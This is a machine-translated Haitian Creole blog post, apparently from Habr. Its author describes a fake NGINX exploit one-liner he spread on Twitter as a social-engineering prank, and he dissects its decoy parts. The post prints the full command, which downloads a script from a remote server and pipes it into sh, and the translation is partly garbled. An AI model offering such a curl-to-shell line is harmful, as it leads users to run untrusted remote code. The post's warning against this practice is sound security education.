Remak. trad.:
TL;DR: Pa sèvi ak dosye pipelining nan sh oswa bash nan okenn sikonstans. Sa a se yon bon fason pou pèdi kontwòl òdinatè w lan.
Mwen vle pataje avèk nou yon ti istwa sou yon eksplwa PoC komik ki te kreye 31 me. Li parèt san pèdi tan an repons a nouvèl ki soti nan
Lè m te fini travay sou yon nouvo teknik obfuscation nan boukl, mwen te site tweet orijinal la ak "fuit yon PoC k ap travay" ki fòme ak yon sèl liy kòd ki sipoze eksplwate vilnerabilite dekouvri. Natirèlman, sa a se te yon istwa san sans. Mwen sipoze ke mwen ta dwe imedyatman ekspoze, e ke nan pi bon mwen ta jwenn yon koup la retweets (o byen).
Sepandan, mwen pa t 'kapab imajine sa ki te pase apre. Popilarite tweet mwen an te monte. Surprenante, nan moman sa a (15:00 Moskou lè 1 jen) kèk moun te reyalize ke sa a se yon fo. Anpil moun retweet li san yo pa tcheke li ditou (se pou kont li admire bèl grafik ASCII li soti).
Jis gade jan li bèl!
Pandan ke tout bouk sa yo ak koulè yo gwo, li klè ke moun te oblije kouri kòd sou machin yo wè yo. Erezman, navigatè yo travay menm jan an, epi konbine avèk lefèt ke mwen pa t reyèlman vle jwenn nan pwoblèm legal, kòd la antere l 'nan sit mwen an te jis fè apèl eko san yo pa eseye enstale oswa egzekite nenpòt lòt kòd.
Ti digresyon:
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
Jeni sosyo-elektwonik (SEE) - plis pase jis èskrokri
Sekirite ak abitye te yon pati enpòtan nan eksperyans sa a. Mwen panse ke yo se sa ki te mennen nan siksè li. Liy lòd la klèman enplike sekirite lè li refere a "127.0.0.1" (localhost la byen koni). Localhost konsidere kòm an sekirite epi done ki sou li pa janm kite òdinatè w lan.
Abitye se te dezyèm eleman kle SEE nan eksperyans la. Depi odyans lan sib prensipalman fèt nan moun ki abitye ak Basics yo nan sekirite òdinatè, li te enpòtan yo kreye kòd pou ke pati nan li te sanble abitye ak abitye (ak Se poutèt sa an sekirite). Prete eleman nan ansyen eksplwate konsèp ak konbine yo nan yon fason etranj pwouve yo gen anpil siksè.
Anba a se yon analiz detaye sou yon sèl-revètman la. Tout bagay sou lis sa a mete nati kosmetik, ak pratikman pa gen anyen ki nesesè pou operasyon aktyèl li yo.
Ki eleman ki vrèman nesesè? Sa a -gsS
, -O 0x0238f06a
, |sh
ak sèvè entènèt la tèt li. Sèvè entènèt la pa t gen okenn enstriksyon move, men tou senpleman te sèvi grafik ASCII lè l sèvi avèk kòmandman echo
nan script ki genyen nan index.html
. Lè itilizatè a antre nan yon liy ak |sh
nan mitan, index.html
chaje ak egzekite. Erezman, gadyen sèvè entènèt la pa te gen okenn move entansyon.
-
../../../%00
— reprezante ale pi lwen pase anyè a; -
ngx_stream_module.so
- chemen nan yon modil NGINX o aza; -
/bin/sh%00<'protocol:TCP'
- nou swadizan lanse/bin/sh
sou machin nan sib ak redireksyon pwodiksyon an nan kanal la TCP; -
-O 0x0238f06a#PLToffset
- engredyan sekrè, complétée#PLToffset
, gade tankou yon konpanse memwa yon jan kanmenm genyen nan PLT la; -
|sh;
- yon lòt fragman enpòtan. Nou te bezwen redireksyon pwodiksyon an nan sh/bash yo nan lòd yo egzekite kòd ki soti nan sèvè entènèt atak la ki sitiye nan0x0238f06a
(2.56.240.x
); -
nc /dev/tcp/localhost
- yon egare nan ki netcat refere a/dev/tcp/localhost
pou tout bagay sanble an sekirite ankò. An reyalite, li pa fè anyen epi li enkli nan liy lan pou bote.
Sa a konkli dekodaj nan script nan yon sèl-liy ak diskisyon an sou aspè nan "jeni sosyo-elektwonik" (èskrokri konplike).
Konfigirasyon sèvè entènèt ak kontre mezi
Piske a vas majorite abonnés mwen yo se infosec/hackers, mwen deside fè sèvè entènèt la yon ti kras pi rezistan a ekspresyon "enterè" sou pati yo, jis pou mesye yo ta gen yon bagay yo fè (e li ta plezi yo mete kanpe). Mwen pa pral lis tout enkonvenyans yo isit la depi eksperyans la toujou ap kontinye, men isit la se kèk bagay sèvè a fè:
- Siveye aktivman tantativ distribisyon sou sèten rezo sosyal epi ranplase divès miniature aperçu pou ankouraje itilizatè a klike sou lyen an.
- Redireksyon Chrome/Mozilla/Safari/etc nan videyo pwomosyon Thugcrowd olye pou yo montre script koki a.
- Gade pou siy evidan nan entrizyon / piratage flagran, ak Lè sa a, kòmanse redireksyon demann nan serveurs NSA (ha!).
- Enstale yon Trojan, osi byen ke yon routki BIOS, sou tout òdinatè ki gen itilizatè yo vizite lame a nan yon navigatè regilye (jis plèzantri!).
Yon ti pati nan antimèr
Nan ka sa a, objektif mwen sèlman se te metrize kèk nan karakteristik yo nan Apache - an patikilye, règ yo fre pou redireksyon demann - e mwen te panse: poukisa pa?
NGINX eksplwatasyon (reyèl!)
Abònman nan
Sous: www.habr.com